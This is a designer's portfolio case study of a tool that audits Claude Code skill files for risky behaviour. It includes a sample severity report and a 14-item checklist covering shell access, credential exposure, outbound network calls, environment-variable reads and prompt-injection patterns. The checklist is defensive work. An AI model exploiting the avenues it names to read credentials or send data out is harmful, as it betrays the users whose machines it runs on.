Skip to main content
Work

AI Skill Safety Auditor

AI

Claude Code lets you install AI-powered tools from simple text files. Those files can request permission to run commands, read your saved credentials, and send data to external servers — all before you've looked at what you're actually installing. I built and published a free tool that audits these files for risky behaviour before they run on your machine.

Try it free
Role Product Manager & Designer
Organization Public Good Alliance
Year 2026
Last updated April 2026
Skill Website Skill Safety Auditor

Why Claude Code Skills Are a Security Risk

Most digital tools you install come with a paper trail: a license agreement, a review process, some chain of accountability. Claude Code skills have none of that. They're markdown files, and if you are not careful, they can declare shell access, read your environment variables, and send data off-device before you've opened a single line.

The risk is not understanding the risk. Adoption is outpacing governance.

For organizations retooling around AI, governance conversations focus on platforms and systems. But the attack surface here is the individual: their machine, their credentials, their judgment call at the moment of install. Depending on your organization, particularly in work settings where employees or contractors work from home and bring their own machines, controls don't reach that far.

How Skill Safety Auditor Works

Skill Safety Auditor is a free tool that checks any Claude Code skill file against 14 security criteria — shell access, credential exposure, prompt injection, and source provenance — then returns a severity-graded report with plain-language remedies. Run it before installing a skill, or after, to audit skills already on disk.

Skill Safety Audit checks 14 things: what system access the skill is requesting, whether any bundled scripts make outbound network calls, whether the prompt contains hidden instructions, and whether the source traces back to an active, real repository.

The output is a structured report with three severity levels, based on the standard red, amber, and green alerts. A critical finding means don't install. Warnings come with step-by-step remedies written in plain language, delivered one step at a time, with a check-in after each so no one is handed a wall of instructions to work through alone.

You can run it before installing a skill, to review it before it ever touches your machine, or after, to audit skills already on disk.

What a Skill Safety Audit Looks Like

This is what a real audit looks like. Findings are grouped by severity. Critical results include a conversational step-by-step remedy, one step at a time, with check-ins between each.

Skill Safety Report: example-org/analytics-assistant Audited 2026-04-07 · 14 checks
Critical — 1
!
Shell tool access declared
The skill requests Bash tool access. This grants Claude shell access to your machine — the ability to run arbitrary commands, read the filesystem, and modify files.
→ Step 1: Open the skill file and locate the tools: section in the frontmatter. Do you see Bash listed? Let me know and I'll walk you through next steps.
Warnings — 2
~
Outbound network calls in bundled script
analytics.py makes external requests. Verify the destination before running.
~
Environment variable access pattern detected
The script reads os.environ. Review what data may be accessed and whether it could be transmitted externally.
11 checks passed — no prompt injection, no credential-adjacent tools, public repository verified active
Do not install Resolve the critical finding before installing. Ready to walk you through it.

14 Checks Across Four Categories

Built from these first principles: what can a skill actually do, what would a malicious actor exploit, and what can be verified without executing anything?

Frontmatter (metadata) 4 checks
  1. Shell / Bash tool access
  2. File write access
  3. Credential-adjacent tools
  4. MCP server access
Bundled Script Content 3 checks
  1. Executable file presence (.py, .sh, .js)
  2. Outbound network calls
  3. Environment variable access
Prompt Injection Patterns 4 checks
  1. Hidden or encoded instruction blocks
  2. Permission escalation attempts
  3. Conditional context triggers
  4. Instructions unrelated to stated purpose
Source Provenance 3 checks
  1. Public repository verification
  2. Repository activity and maintenance status
  3. Author identity signals

How Skill Safety Auditor Was Built

Identified the gap

I began by surveying the skills ecosystem and reviewed research on AI tooling attack surfaces to confirm the gap was real. Speaking to colleagues who use AI tools regularly also revealed they weren't aware of the risks.

Designed the taxonomy

Based on what I was looking for in a tool, I built the audit framework from scratch: four check categories, three severity tiers, 14 individual checks, each with plain-language remedies designed for non-technical readers.

Built and iterated

I built the skill using Claude Code's skill-creator framework, testing against edge cases and refining the remedy walkthrough to work conversationally rather than as a static checklist.

Validated with a live audit

After the build I ran a real audit against a public skill to confirm the checks worked correctly, the reporting was accurate, and the output was useful to someone seeing it for the first time.

Credibility through best practices

To demonstrate authenticity on the live website, I created and exposed fictional issues in a test file, based on standards established by the European Institute for Computer Antivirus Research (EICAR).

The Auditor Audits Itself

Convincing potential users to trust me while encouraging critical thinking at the same time was an opportunity to demonstrate public accountability in real time.

What Worked

  • Seeing around corners. I identified an unaddressed security attack surface in a fast-growing ecosystem, then built and shipped a fix before it spread.
  • Empathy as a design constraint. The remedies were written for someone who just wants to install a useful tool safely. Every check produces guidance a first-time user can act on without needing to understand what a threat model is.
  • Product over tooling. I turned what could have been a static checklist (and create yet more jobs to be done) into a conversational, adaptive experience that responds to what the user finds and guides them through it.

What It Taught

  • Ecosystem governance is a product category. Most AI safety work happens at the platform layer through model training, usage policies, and content filters. The open ecosystem of community-built and vibe-built tools operates one level down where governance infrastructure is largely absent.
  • Trust is the hardest design problem. The tool asks users to think critically about what they install, which means it has to earn their trust while teaching them not to trust blindly. That tension shaped every decision.
  • Credibility requires working transparently. I built the Skill Safety Audit because I needed it. And it's part of my toolkit now. Publishing the skill, and showing how others can test it before installing, was a transparent way to demonstrate credibility while providing a useful public service.